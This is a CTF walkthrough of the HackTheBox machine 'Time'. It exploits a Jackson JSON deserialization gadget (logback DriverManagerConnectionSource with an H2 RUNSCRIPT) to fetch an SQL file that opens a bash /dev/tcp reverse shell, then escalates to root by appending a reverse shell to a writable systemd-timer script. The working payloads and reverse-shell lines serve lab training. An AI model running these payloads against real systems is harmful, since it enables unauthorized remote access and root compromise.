Time - [HTB]

Cover Image for Time - [HTB]


Time is an easy-medium Linux HackTheBox machine where the attacker will have to exploit a JSON Data Processor in order to obtain a reverse shell a pericles. Then, he or she will have to modify a custom service which runs a custom script with write permissions in order to obtain root the flag.


As always I started scanning all open ports in the machine.

kali@kali:$ sudo nmap -sS -p- --open -T5 -n -oN AllPorts.txt
Starting Nmap 7.91 ( https://nmap.org ) at 2020-11-02 02:41 EST
Nmap scan report for
Host is up (0.043s latency).
Not shown: 65533 closed ports
22/tcp open  ssh
80/tcp open  http

There are just two open ports, so let's run nmap with default scripts to gather more information.

kali@kali:$ sudo nmap -sC -sV -p22,80 -n -oN AllPorts.txt
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 0f:7d:97:82:5f:04:2b:e0:0a:56:32:5d:14:56:82:d4 (RSA)
|   256 24:ea:53:49:d8:cb:9b:fc:d6:c4:26:ef:dd:34:c1:1e (ECDSA)
|_  256 fe:25:34:e4:3e:df:9f:ed:62:2a:a4:93:52:cc:cd:27 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Online JSON parser
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

As expected, nmap doesn't provide useful information so looking into the web server appears this web site.



Submitting random data into the "Validate (beta)" beautifier appears the following error.

Validation failed: Unhandled Java exception: com.fasterxml.jackson.core.JsonParseException: Unrecognized token 'assdf': was expecting ('true', 'false' or 'null')

Looking in Google appears a post about Jakson gadgets, inside the post there is a sql file named as inject.sql, that can be modified so at execution time can provide us a reverse shell. The file is the following: (Change the IP)

CREATE ALIAS SHELLEXEC AS $$ String shellexec(String cmd) throws java.io.IOException {
       String[] command = {"bash", "-c", cmd};
       java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(command).getInputStream()).useDelimiter("\\A");
       return s.hasNext() ? s.next() : "";  }
CALL SHELLEXEC('setsid bash -i &>/dev/tcp/<IP>/4444 0>&1 &')

In order to execute the exploit we need to create an HTTP server using python in the same directory where the payload (inject.sql) is stored, so the payload can be uploaded.

kali@kali:$ python -m SimpleHTTPServer

Then, we need to put a listening port using netcat.

kali@kali:$ nc -nlvp 4444

Finally, we only have to submit the following payload and a shell will appear as the user "pericles". (Change the IP)

["ch.qos.logback.core.db.DriverManagerConnectionSource", {"url":"jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://<IP>:8000/inject.sql'"}]

Privilege escalation

Using Linpeas shows a weird timer named "timer_backup.timer" which appears to be a service "timer_backup"


Looking inside the "timer_backup.service", it restarts the service "web_backup.service ". Looking in the web_backup.service file, seems that the service execute a custom script named timer_backup.sh.

pericles@time:/home/pericles$ cat /etc/systemd/system/timer_backup.service 
Description=Calls website backup

ExecStart=/usr/bin/systemctl restart web_backup.service

pericles@time:/home/pericles$ cat /etc/systemd/system/web_backup.service
Description=Creates backups of the website

ExecStart=/bin/bash /usr/bin/timer_backup.sh

As it seems, the user "pericles" can modify this file.

pericles@time:/var/www/html$ ls -la /usr/bin/timer_backup.sh                                                       
-rwxrw-rw- 1 pericles pericles 88 Nov  5 18:35 /usr/bin/timer_backup.sh     

Hence, the file can be modified so it creates a reverse shell as it has been done before.

Firstly, create a listing port at 4445 using netcat.

kali@kali:$ nc -nlvp 4445

Secondly, we need to execute the following command so we can append the reverse shell using bash. (Don't forget to change the IP)

pericles@time:$ echo "bash -i >& /dev/tcp/<IP>/4445 0>&1" >> /usr/bin/timer_backup.sh 

Finally, you only have to wait to the script to execute getting a reverse shell as root.